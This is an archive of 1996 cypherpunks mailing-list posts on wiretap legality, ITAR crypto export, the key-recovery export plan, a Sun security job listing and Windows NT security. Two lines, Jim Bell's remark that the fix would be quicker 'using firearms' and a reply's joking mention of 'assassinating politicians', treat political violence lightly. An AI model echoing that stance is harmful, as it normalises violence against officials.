From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 5 Oct 1996 13:32:26 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <199610042343.QAA20758@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:04 PM 10/4/96 -0700, Vladimir Z. Nuri wrote:
>
>reponses to my last post were very illuminating and
>interesting, and one key point by someone-or-other
>caught my attention.
>
>he made the distinction of "search and seizure" made with
>the knowledge of the person involved, and "search and
>seizure" such as wiretapping done without the knowledge
>of the person surveilled.
>
>if one were to try to say that wiretapping was unconstitutional,
>it seems one would have to define why it is an *unreasonable*
>kind of search and seizure. and this distinction might be a
>great, prime candidate: because the participant is *unaware*
>of the "seizure," there is too great a potential for abuse.

I've been saying this for years!  I think that one of the most telling 
arguments is that the main (if not the only!) reason that wiretaps are kept 
secret is that, for obvious technical reasons, they CAN BE kept secret!   
Pardon me for being facetious, but I see no principle in the Constitution 
that states "Anything the government can get away with is okay," so I think 
it's predictable that wiretap law would be constitutionally defective.  If 
wiretaps had been somehow impossible to accomplish secretly, nobody today 
would believe that secrecy was somehow allowable! 

It didn't have to be this way.  The SC might simply have said that wiretap 
warrants must follow the same rules all other warrants followed, meaning 
that the target is informed of the tap when it is placed.  Sure, the police 
would howl, complaining that they'll never hear anything "useful" if the 
target is informed, but then again, the Constitution cannot guarantee that 
any particular search would achieve its intended results.

Are police entitled to use thumbscrews if simply asking a question won't get 
the "right" answer"?  I don't think so.  


>it seems to me many people's fears here boil down to this
>fear of the government surveilling them without their knowledge,
>of them being denied the right to choose to be in contempt of
>court and reject handing over information when presented with
>a warrant/subpoena. (is this a right? is it being broken by surreptitious
>surveillance?)

One thing that was very important to those who wrote the US Constitution was 
the sanctity of contracts.  The idea was, presumably, that any citizen 
should be entitled to enter into agreements with others without fearing that 
the terms of those contracts would be abused/changed by the government.  
(assuming those terms were legal.)  By its very nature, a (secret) wiretap 
warrant violates the right of a person to CHALLENGE the warrant, and it also 
requires the other person (telephone company?) to break what is or should be 
an implied right of user to private communications.


>I am really amazed that there isn't much case law on wiretaps, which
>have been around a long time. at least it is rarely quoted here.
>what exactly is a legal wiretap? has anyone challenged the fundamental
>authority of the government in making wiretaps in which subjects
>are unaware of the metaphorical "search and seizure" going on?

I think it's really very simple.  Wiretaps in the US were illegal until 
1968.  Congress had repeatedly refused to authorize them, although they were 
done anyway but were not admissible in court. (proving that the same kind of 
people who will tell you wiretaps are "reasonable" apparently think it's 
"reasonable" to break the law for their own goals...)   1968 was a time of 
great (and well-justified!) turmoil in the country.   And prior to and 
subsequent to 1968, until about 1983, telephone service (both local and LD) 
were monopolized, so the only entity which was aware of those wiretaps and 
could thus challenge them had a non-arm's-length relationship with the US 
Government.  Even subsequent to 1983, local service is still monopolized, 
although that will shortly change.  (This monopoly status has helped confuse 
the issue, because being a monoply a telephone company must deal with the 
government and is dependant on it, and morever a customer is not entitled to 
"shop around" for a more trustworthy source of phone service.)

As I understand it, there is a principle in law that all affected parties to 
a dispute must be included in a proceeding. (To ensure that each can protect 
his own rights.)  Obviously, targets of wiretaps have not been informed, and 
thus can't possibly have been included.  There is, therefore, no reason to 
believe that the rights of wiretap-targets have been protected, and further 
it seems apparent that any relevant precedents which have been set in the 
wiretap era cannot be considered Constitutionally valid.  Of course, some 
lawyers (who have been trained to accept the status quo with little or no 
challenge) will disagree!  However, those same lawyers would have accepted 
the Dred Scott decision without question, Plessy vs. Fergusen, etc.

While I'm sure that I will be corrected if this is wrong, somehow I doubt 
whether there has EVER been a "before-the-fact", full challenge of a wiretap 
order _including_ representation for the target of the wiretap.  Further, I 
also doubt whether there is frequently ANY SORT of challenge to a wiretap  
by a telephone company, even when the target was not informed.  Quite 
simply, the telephone company does not consider itself to be in the business 
of protecting the rights of its customers!  And without real challenges, 
there can be no presumed validity to such warrants.
 
>recent Bernstein and Junger cases are going to be fantastic milestones
>in our legal system for challenging the cryptographic status quo.
>I wonder if cpunks might be interested in challenging the 
>wiretap status quo!! it would seem like the first logical step.

Since it has always been legal to use encryption (in the US), they're really 
not "challenging the cryptographic status quo."  Rather, they are trying 
prevent the "cryptographic status quo" from being CHANGED to match the 
desires of the government.   (naturally, the government tries to 
misrepresent this...)    The government uses phrases like, "preserving 
law-enforcement access," implying that they're somehow maintaining the 
status quo, when they're actually trying to change it.  What's changing now 
(for engineering reasons) is the practicality of encryption (actually, the 
expense!), not the legality. The government wants to change the law, in 
order to make illegal what was previously impractical.


>the FBI has often said they don't want to expand their powers in 
>wiretapping areas. but are those powers they have right now legitimate?
>if they are not, as many here seem to argue, 
>then they ought to be challenged in court ala the one-man-guerilla
>attacks like Bernstein and Junger. (any takers? <g>)

I don't know about you, but somehow I'm past the idea that it's possible to 
reliably get unbiased justice in court.  Know what I mean?

Even so, if there's one thing we need, it's a challenge to ensure that the 
"fully-caved-in" telephone companies precedent doesn't get automatically 
assumed valid for ISP wiretap orders.

>anyway, I propose that cpunks try to collect all the minutia in the
>case law about wiretaps and try to make the case that wiretapping
>that the FBI has enjoyed is itself not legitimate, and therefore
>any extension of it (such as Clipper) is also illegitimate.

I like the first part of your comment, but let there be no illusion that 
failure to get the government thugs to admit that wiretapping is 
unconstitutional (per se or as done) somehow means that Clipper is legitimate.


>more and more I wonder if this is one of the key differences between
>libertarian and spook bureacrat's views on GAK, key escrow, key
>recovery (let us put it all under the heading "key access"). the
>spooks seem to emphasize that they should be able to get access
>to communications without giving anyone the opportunity to refuse
>or possibly even know about such access. libertarians seem to
>insist that this is a violation of privacy and due process etc.

However, one doesn't have to be a libertarian to conclude that wiretap law 
is disjoint from the rest of search-warrant precedent.  Fortunately, the 
advent of good encryption should (if it is allowed to) make wiretap law 
irrelevant.  In a sense, technology will be fixing a legal error.  (This fix 
would have been far quicker and cheaper if it had been accomplished using 
firearms, but that's another story.)


>I think there may be a legitimate argument here that might have
>legal merit that a reasonable "search and seizure" ought to
>involve the knowledge of the participant, and that unreasonable
>searches and seizures often do not. hence, wiretapping without
>suspect agreement may be illegal? (in all the other ways that
>evidence is obtained through warrants/subpoenas, one needs
>the cooperation of the suspect?) 

Well, they don't technically need the "cooperation," but they are still 
required to inform the target.  For example, if they get a search warrant 
for a house that happens to be empty when they show up, they are obligated 
to leave notice of the search and lists of what was taken.  Apparently they 
need to do this EVEN IF they would have been able to get into the house 
surreptitiously without leaving any trace.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sat, 5 Oct 1996 12:27:38 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Fw: Re: ITAR satellite provision
Message-ID: <3.0b28.32.19961004164704.006bc324@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:09 PM 10/4/96 +0000, The Deviant wrote:

>So.. if I were to take PGP, put it on a floppy disk, tape it to a model
>rocket, and launch it across the mexican border, that's not exporting it
>(although the FAA might complain)?

As I read the regs, it's not an export at the moment it's launched, but
it's almost certainly an export when it reaches Mexican airspace or when it
touches Mexican soil.

The "rocket exception" is not useful vis-a-vis crypto. Period. I'm very
sorry I ever had anything to do with this thread and I'm not posting about
it again. 


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Humble <deeb@x.org>
Date: Sat, 5 Oct 1996 08:30:44 +0800
To: dlv@bwalk.dm.com
Subject: Re: Clipper III on the table
In-Reply-To: <oys0uD31w165w@bwalk.dm.com>
Message-ID: <9610042054.AA22661@hydra.cde.x.org>
MIME-Version: 1.0
Content-Type: text/plain


dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) sez:
> If I own a computer and some contractor is writing something on it
> for me, I should have the right to tell the contractor that I don't
> want, e.g., any unlicences software and any data encrypted so that I
> can't read it.

well, it's *your* computer...

> Likewise the gubmint or a corporation bigger than mine is free to
> say that there should be no data on its computers or its contractors
> computers that they can't read.

Whoa!  Unless the service contracted for includes the use of the
contractors' computers, what business does the employer have poking
around in someone else's computer?  I can easily see Big Brother
demanding exactly that, but He won't hire me under those conditions.

Or was that just a slip of the mind, assuming large organizations
should have greater powers than smaller ones?  I do that too much
myself.

Stephen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sun, 6 Oct 1996 23:15:08 +0800
To: cypherpunks@toad.com
Subject: Re: This list is a joke
Message-ID: <844448507.9445.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> When I subscribed to this list, I thought it would have decent
> communication on worthwhile topics.  I've come to realize though that 75%
> of the messages I receive are from people whining like 4 year olds.  I am
> making a huge assumption in saying that most of the people on this list
> are adults.  It is time to start acting like it.
> 
> Please take my name off this list.

I think if you qualified as an adult you would be able to unsubscribe 
yourself from a mailing list without assistance.

Keep the whingeing to yourself...


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 5 Oct 1996 14:57:20 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: The New GAK-Clipper Thing will Fail
Message-ID: <199610050013.RAA22933@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:41 AM 10/4/96 -0700, Bill Stewart wrote:
>At 03:07 PM 10/3/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>>The point, of course, is NOT to encourage these companies to support Clipper 
>>IV.  Rather, goal is to suggest to them a "poison pill" which would make 
>>their cooperation meaningless in the end, while at the same time giving them 
>>a 2-year free 56-bit export.  Think of it as a monkey-wrench they can throw 
>>into the works.
>
>A really _fine_ post!  I'm also impressed by the way they announced it
>just _after_ Congress ended its session, while they're busy losing the export
>level in court.

There's an uncomfortable "tactics" problem, associated with my previous 
suggestions.  To say something like, "we think you ought to change that GAK 
proposal by [fill in the blank]", at least IMPLIES that it will somehow be 
"acceptable" should that change be made.   Well, to me, no GAK will ever be 
acceptable.  Even so, I think it would still be tactically useful to help 
sabotaging GAK by "improving it to death."  

I start by assuming that most of the companies who signed onto the Axis 
("alliance") would really have preferred to NOT see GAK, everything else 
being the same.  They want the goodies; they don't want the shit.  I think 
they should be approached by pointing this out, and suggesting that if they 
want to limit the negative publicity they'll surely get from this plan, 
while at the same time collecting the goodies the government is offering, 
they can conveniently and publicly "interpret" their rights broadly, 
announce that they'll structure their systems in the least 
government-friendly way possible.

All this should be possible, because of the fact that this proposal isn't 
really even settled.  In fact, it doesn't even ask the participants to show 
their plan immediately, merely after two years or so.

Insisting that the government pay for all legal challenges is a good start, 
and refusing to do any GAK transfer without a court challenge.


Another thing they could do is to insist that 56-bits of key always remain 
non-GAK.  (perhaps increasing at the rate of two bits every three years.)  
This would make GAK essentially useless for that drift-net fishing that's 
often talked about, because even a sudden policy change forcing "key-escrow" 
people to give up all their keys will still make decrypting a message a 
pain.  It would also make it easier to use super-encryption, because finding 
that needle in that 2**56 haystack would make it impossible to prove which 
particular decrypt contained a further-encrypted message: Even if 
super-encryption were outlawed, it would become essentially impossible to 
prove that none of the other (2**56)-1 messages were not some valid, 
non-super-encrypted message.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sat, 5 Oct 1996 14:23:04 +0800
To: snajdr@pvt.net
Subject: RE: WINDOWS NT ????
Message-ID: <19961005002433046.AAA82@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


An NT machine running off the shelf protocols and services is certainly more secure than your average linux install. Of course clueless administrators for either (any) platform can leave the door wide open easily enough. 

But what do you mean by secure?

>snow (snow@smoke.suba.com) said something about Re: WINDOWS NT ???? on or about 10/4/96 2:57 PM

>
>> pclow wrote:
>> > Adamsc wrote:
>> > > > is Windows NT secured system ?
>> > NT? Secured? hahahahahahahahahahahahahahahahhahahahahahahaha
>>                         8-)
>> How ? 
>
>     By turning off the machine, unpluging the ethernet, moving the
>hard drive to another state...
>
>
>Petro, Christopher C.
>petro@suba.com <prefered for any non-list stuff>
>snow@smoke.suba.com
>End of message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Sat, 5 Oct 1996 10:52:05 +0800
To: cypherpunks@toad.com
Subject: Sun's GAK position
Message-ID: <199610042232.RAA14312@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I haven't been able to find a position statemnet from Sun Microsystems about
the new GAK plan, but it looks like I did find a position.  This is from
"http://www.sun.com/corporateoverview/CorporateEmployment/LISTINGDIR/JobDetailAUF971004.html":

>Created on Oct 01 1996 06:01. To return to: Employment Opportunities Home
>Page.
>----------------------------------------------------------------------------
>
>Sun Employment Req#: AUF971004
>
>SUMMARY
>
>Descriptive Title: System Engineer
>Skills: Security & Cryptography Exp.
>Functional Area: Engineering:  Engineering
>Location: Vienna, VA
>
>DESCRIPTION
>
>Extensive Security and Cryptography knowledge and skills, ability to
>authoratatively present and advocatae security technologies at technical and
>public policy levels, confidence and skill at writing and presenting
>security documents and presentations. specific knowledge of government
>security requirements. A US Government Top Secret SCI and potentially other
>clearances will be necessary for this position.
>The position of Principal Architect for Security and Networks requires an
>individual with the following levels of education, experience and
>specialized knowledge. A masters degree in a computer related field or a
>bachelors degree in a computer technology and a masters degree in a business
>oriented discipline is required. A minimum of twelve years of directly
>related experience in computers, computer security and mission critical
>systems design, and deployment is also required. Credit for four years
>experience may be granted for a candidate with a masters degree in computer
>science or computer security. Up to six years experience can be credited for
>a PHD in somputer security. The condidate needs experience and
>specializedknowledge in the areas of:
>Government Security Requirementes, NSA MISSI and DoD DMS programs, Public
>policy issues of cryptography and Key Escrow, Current workstation and server
>hardware, Trends in network and systems security, Analysis of competing
>security products and technologies. Hands-on experience with installing and
>configuring computer hardward, Sun's product offerings in the security
>arena, NCSC and Common Criteria evaluaations of trusted systems. Export
>controls as they apply to encryption and security products.
>To be successful in the position the candidatae must be able and willing to
>write short analytical papers and long research documents. The position also
>requires short notice or extemporaneous presentations on security,
>technology and Sun specific subjects to groups of one to two hundred
>customers or industry professionals.
>A successful candidate must be capable of presenting themselves in an
>authoritative fashion on many aspects of security in order to influence
>product development in directions advantageous to Sun Federal. the candidate
>must also be comfortable and confident when representing Sun and Sun Federal
>in government and industry standards bodies and technology forums.
>To be successful the candidate must be able to develop, define and
>articulate a security vision and to develop support both within and external
>to Sun for necessary technological and procedural changes necessary to
>accomplish that vision. The condidate must either hold or be capable of
>receiving US Government Security Clearances for Top Secret and Special
>Compartmented Information. These clearances may require a CI Polygraph test.
>This position will be locate in Vienna, VA and report to the Sun Federal
>Director of Systems Engineering.
>----------------------------------------------------------------------------
>CONTACT:
>Employment Agency resumes referred to this posting are considered
>unsolicited; Sun does not accept unsolicted resumes.
>To apply, please reference the requisition number of AUF971004 and email,
>fax or mail your resume, attention Recruiter: Staffing45/OWSMI96, using:
>
>   * Resume Submittal Form
>   * Email alias: Staffing45@bruin.corp.Sun.COM [ASCII ONLY, PLEASE]
>   * Fax number:  630-285-8177
>   * Mail Address:
>     Sun Microsystems, Inc.
>     2550 Garcia Avenue
>     Mountain View, CA 94043-1100
>     Mail Stop: UITA01
>
>----------------------------------------------------------------------------
>
>Employment Opportunities at Sun
>
>----------------------------------------------------------------------------


                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 5 Oct 1996 08:42:42 +0800
To: cypherpunks@toad.com
Subject: KRF_eat
Message-ID: <199610041735.RAA19781@pipe1.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A roundup of press reports on GAK: 
 
   "IBM, other firms, in data encryption alliance" 
 
      The consortium was initiated by IBM. "Export controls 
      are a fact of life," said Jim Bidzos. 
 
   "U.S. To Loosen Computer Code Restrictions" 
 
      "It's wrongheaded, and it's going backward," Peter 
      Harter, at Netscape, said. 
 
   "U.S. Export of High-Tech Devices Planned" 
 
      CDT's Danny Weitzner said U.S. companies' and 
      citizens' encrypted communications sent over the 
      Internet could be vulnerable to "improper foreign 
      government access." 
 
      The administration doesn't want that to happen and is 
      working with major trading partners and other 
      countries to adopt plans that are consistent with the 
      U.S. plan and to expedite electronic key recovery by 
      law enforcement, the CIA's Deutch said. 
 
   "IT Execs, Lawmakers Reactions Mixed on Encryption Plan" 
 
      Rick Cardona, a security technology engineer at 
      security software maker TradeWave Corp., said the law 
      doesn't go far enough. "I think this is part of a 
      trend. It's only a matter of time before the 
      government will allow exports of 128-bit key 
      software." 
 
   "NCR Corp. Joins Alliance To Develop Exportable, 
   Worldwide Strong Encryption " 
 
      "We also look forward to the rapid movement of the 
      work of the alliance into an established standards- 
      based consortium body." 
 
   "TradeWave meets new government data encryption 
   requirements" 
 
      Although other Internet software security companies 
      have announced their intention to support this new 
      key-recovery requirement, no other Internet Web 
      security software company currently offers this 
      service to its customers besides TradeWave. 
      TradeWave's current customers, which include over 350 
      electric power companies representing over 70% of the 
      electric power industry, are using the TradeVPI 
      software and services which include this key recovery 
      feature. 
 
   ----- 
 
   http://jya.com/krfeat.txt  (22 kb for 6) 
 
   ftp://jya.com/pub/incoming/krfeat.txt 
 
   KRF_eat 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 5 Oct 1996 09:53:19 +0800
To: cypherpunks@toad.com
Subject: ABA Likes GAK
Message-ID: <199610041740.RAA19910@pipe1.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-03-96 at 19:09 EDT, American Banker 
 
 
   Banks Like Export Plan for High-Power Encryption  
 
   By Drew Clark 
 
   ----- 
 
   "Banks have really taken a leadership role in the 
   responsible management of cryptography," said a senior 
   Clinton administration official who asked not to be 
   named. "Banks are already doing what we want other 
   organizations to do: safeguarding their keys and 
   providing them, when necessary, to law enforcement." 
 
   "Providing 56-bit encryption with key recovery doesn't 
   help us," said Netscape spokeswoman Chris Holton. "The 
   government is saying that you can export it but you have 
   to provide us with the keys. We feel that is extortion on 
   the part of the government." 
 
   "We are making the best of a bad situation," said Scott 
   Schnell, vice president of marketing for RSA Data 
   Security. 
 
   ----- 
 
 
   Bank technology experts have reacted favorably to the 
   Clinton administration's proposal to liberalize the 
   development and sale of strong data security tools. 
 
   This week, the government said it would lift export 
   restrictions on certain kinds of cryptography, provided 
   U.S. companies agree to cooperate with a procedure that 
   would give law enforcement officials access to the "keys" 
   of such codes, upon presentation of a warrant. 
 
   Banks were heartened by the announcement because many 
   view the widely used Data Encryption Standard - a 
   low-level form of data scrambling - as inadequate 
   protection against the rising computer power of so-called 
   hackers. 
 
   Though banks can use a complex 56-bit data encryption key 
   for financial transactions, sensitive communications with 
   overseas branches are limited to a less powerful 40-bit 
   standard. 
 
   Banks hope that a loosening of restrictions in general 
   will benefit them, too. 
 
   "This policy announcement is better than anyone 
   expected," said Kawika M. Daguio, federal representative 
   at the American Bankers Association in Washington. "It is 
   gravy for us, but it's the meat and potatoes for the 
   hardware and software industries." 
 
   "Banks probably won't be adversely affected," said 
   Stewart A. Baker, a partner at Steptoe & Johnson, a 
   Washington law firm, "and they will be left pretty much 
   where they were before." 
 
   The announcement by Vice President Al Gore said that 
   controls over powerful encryption technology would be 
   lifted as the government and private sector develop a 
   "key recovery" system. (International Business Machines 
   Corp. already has stepped forward to head a consortium 
   dedicated to creating such a system.) 
 
   Current law forbids the export of computer hardware or 
   software that uses cryptographic codes with digital 
   "keys" - randomly generated combinations of 0's and 1's - 
   longer than 40 bits. The longer the key length, the more 
   impenetrable the code. 
 
   For three years, the government has said it would permit 
   the general use of more complex cryptography only if the 
   companies using it placed their keys in the hands of the 
   government or a third party. 
 
   "Key escrow," as it is known in the technical community, 
   is needed in order to prosecute people who have stored 
   evidence of illegal activity on the hard drive of a 
   computer, officials argued. 
 
   But the private sector - banks included - have balked at 
   handing over such access to any third party. 
 
   The disagreement gave rise to a compromise system known 
   as "key recovery" in which companies would hold their own 
   keys but could be required to divulge certain information 
   about specific transactions when presented with a court 
   order or warrant. 
 
   "What is novel is that it doesn't escrow any keys," said 
   Homayoon Tajalli, executive vice president of Trusted 
   Information Systems, Glenwood, Md., one of IBM's 
   consortium partners. 
 
   "If the government comes and gets this data with a court 
   order," explained Mr. Tajalli, "then they take a digital 
   lockbox from the third party or parties that hold it, and 
   they read the message." 
 
   Kathy Kincaid, director of information technology for 
   IBM, said the difference between key escrow and key 
   recovery is analogous to the following approach to 
   securing a house when its owner goes on vacation: Instead 
   of giving a key to two neighbors, the owner gives each 
   neighbor half the combination to a lockbox that holds the 
   key. 
 
   "You must have both halves and put them together in 
   exactly the right sequence," said Ms. Kincaid. "This 
   provides protection against a single point of attack." 
 
   Companies participating in development of key recovery 
   systems include: Apple Computer Inc., Digital Equipment 
   Corp., Groupe Bull, Hewlett-Packard Co., NCR Corp., RSA 
   Data Security, Sun Microsystems Inc., Trusted Information 
   Systems, and United Parcel Service. 
 
   And a government official said banks may even play a 
   role. 
 
   "Banks have really taken a leadership role in the 
   responsible management of cryptography," said a senior 
   Clinton administration official who asked not to be 
   named. "Banks are already doing what we want other 
   organizations to do: safeguarding their keys and 
   providing them, when necessary, to law enforcement." 
 
   Heidi Kukis, a spokeswoman for Vice President Gore, said: 
   "This key recovery system is the proper balance between 
   commercial interests and national security." 
 
   But not all agree. Some argue that the key recovery 
   system still gives the government too much control over 
   information flow. 
 
   "Providing 56-bit encryption with key recovery doesn't 
   help us," said Netscape spokeswoman Chris Holton. "The 
   government is saying that you can export it but you have 
   to provide us with the keys. We feel that is extortion on 
   the part of the government." 
 
   "We are making the best of a bad situation," said Scott 
   Schnell, vice president of marketing for RSA Data 
   Security. 
 
   "The bottom line is that the standard proposed by the 
   government is an insubstantial step in the right 
   direction," he said. "We want to make sure it is usable 
   and prepare for the day that products will be available 
   that do not have this key recovery situation." 
 
   The government's announcement came three months after a 
   National Research Council report on the role of 
   cryptography in an information-oriented society. 
 
   The report encouraged liberalization of government 
   standards and questioned the feasibility of the key 
   escrow system then favored by government. 
 
   "We raised the issue about the security of key escrow 
   systems," said law professor Kenneth W. Dam, chairman of 
   the body that prepared the report, "and we said the 
   government should work on it." 
 
   "I take it this is an attempt to move in the way of key 
   escrow, with the help of industry," said Mr. Dam. 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Sat, 5 Oct 1996 15:01:20 +0800
To: stewarts@ix.netcom.com
Subject: RE: WINDOWS NT ????
Message-ID: <19961005003845132.AAA82@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


>Bill Stewart (stewarts@ix.netcom.com) said something about Re: WINDOWS NT ???? on or about 10/4/96 7:44 AM

>At 07:47 PM 10/3/96 +1030, you wrote:
>>hi,
>> is Windows NT secured system ?
>

>Windows 4.x moves the graphics/windowing system into Ring 0,
>where the "secure" parts of the kernel are.  Bad.
>This means graphics bugs can make the kernel insecure or crash.
>I don't trust it, especially because Windows 3.1 crashes all the time
>for me, and stupid bugs make Windows 3.1 behave badly for me.
>So if they put the window system in the kernel, I don't trust it.
>End of message

Graphics bugs will not crash the system since graphics bugs still run in protected mode. (ie bugs in applications that screw up GDI).

Buggy video drivers though can bring the system down. 

But this does not affect security, only stability.

Security in NT can be defeated by any clever, out of work, bored, NT device driver author who brews up a stealth device driver replacement (perhaps a COM port improvement) that could run amok on the file system or basically do anything. Of course, any clever device driver developer is making enough money to not be bored nor even consider writing a backdoor into a driver. Right?

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Klaus E. vonEbel" <unicorn@schloss.li>
Date: Sat, 5 Oct 1996 10:21:30 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <Pine.LNX.3.94.961004200836.205C-100000@random.sp.org>
Message-ID: <Pine.SUN.3.94.961004174729.14632A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996, The Deviant wrote:

> On Thu, 3 Oct 1996, Black Unicorn wrote:
> 
> > Date: Thu, 3 Oct 1996 17:07:47 -0400 (EDT)
> > From: Black Unicorn <unicorn@schloss.li>
> > To: jim bell <jimbell@pacifier.com>
> > Cc: Remo Pini <rp@rpini.com>, cypherpunks@toad.com
> > Subject: Re: Fw: Re: ITAR satellite provision
> > 
> [...]
> > "A launch vehicle or payload shall not, by reason of the launching of such
> > vehicle, be considered an export for purposes of this subchapter."
> > 
> > Focus on "by reason of launching of such vehicle,"
> > 
> > Launching a vehicle alone is not export.  It takes more than launch to
> > make it an export.  More than the launching is not much.
> [...]
> > --
> > I hate lightning - finger for public key - Vote Monarchist
> > unicorn@schloss.li
> > 
> 
> So.. if I were to take PGP, put it on a floppy disk, tape it to a model
> rocket, and launch it across the mexican border, that's not exporting it
> (although the FAA might complain)?

Incorrect.  That is exporting it.  Launching it is not exporting it.
Causing it to land in Mexico is.

> 
>  --Deviant
> "Whatever you do will be insignificant, but it is very important that
> you do it."  --Mahatma Gandhi
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 5 Oct 1996 09:44:31 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <199610042101.OAA08867@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961004174949.14932A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996, jim bell wrote:

> At 08:09 PM 10/4/96 +0000, The Deviant wrote:
> >On Thu, 3 Oct 1996, Black Unicorn wrote:
> >[...]
> >> "A launch vehicle or payload shall not, by reason of the launching of such
> >> vehicle, be considered an export for purposes of this subchapter."
> >> 
> >> Focus on "by reason of launching of such vehicle,"
> >> 
> >> Launching a vehicle alone is not export.  It takes more than launch to
> >> make it an export.  More than the launching is not much.
> >[...]
> >> --
> >> I hate lightning - finger for public key - Vote Monarchist
> >> unicorn@schloss.li
> >> 
> >
> >So.. if I were to take PGP, put it on a floppy disk, tape it to a model
> >rocket, and launch it across the mexican border, that's not exporting it
> >(although the FAA might complain)?
> 
> 
> That's _my_ interpretation.  I look at it this way:  Missile launches can 
> 
> 1.  Return to the country of origin.
> 2.  Splash down in International waters.
> 3.  land on foreign soil.
> 4.  Orbit for awhile and land "somewhere."
> 5.  Orbit essentially forever.
> 6.  Go somewhere in space other than an earth orbit.
> 
> All this stuff is obvious to the people who wrote the regulation. In 
> addition, it is not necessarily certain which of these outcomes will occur 
> in any given launch.   The terminology in the rule above does not 
> distinguish any of these outcomes.  In the absense of further clarification, 
> it is logical to conclude that which particular route the missile 
> subsequently takes is irrelevant to the applicability of the exception.
> 
> This is particularly true, since the writers of that regulation were free to 
> add clarification should they have chosen to do so.  Further, that they 
> DIDN'T "clarify" is logical, because if the outcome of any given missile may 
> be uncertain, and assuming that this regulation was written as a 
> mutual-suck-up maneuver between government and industry, it is reasonable to 
> assume that the regulation would be interpretated to immunize the launcher 
> regardless of the launch's outcome.  One can reasonably suppose that 
> Rockwell wouldn't want to be declared in violation of ITAR simply because 
> the second stage of a rocket failed and dropped a crypto-carrying satellite 
> onto China.

I could make a practice around you alone if I were disposed to take
malpractice cases and if you had a license to practice law.

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Sat, 5 Oct 1996 13:51:10 +0800
To: dc-stuff@dis.org
Subject: Speaker Position Filled
Message-ID: <Pine.BSI.3.91.961004174750.25457A-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



Thanks for all who responded to my request for a speaker on Computer 
Security Disaster Prepardness. I have filled the position and have 
two alternates. 

se7en

-------------------------------------------
I will be speaking in nine different states
over the next nineteen days.  I will not be
reading my email while I am gone......se7en
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 5 Oct 1996 15:41:53 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610042343.QAA20758@mail.pacifier.com>
Message-ID: <199610050110.SAA01860@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>
>>if one were to try to say that wiretapping was unconstitutional,
>>it seems one would have to define why it is an *unreasonable*
>>kind of search and seizure. and this distinction might be a
>>great, prime candidate: because the participant is *unaware*
>>of the "seizure," there is too great a potential for abuse.
>
>I've been saying this for years!

sorry, I must have been distracted with the references
to assassinating politicians. (hee, hee)  (BTW, why don't you
get an AP web site together if you are so hot on the idea?
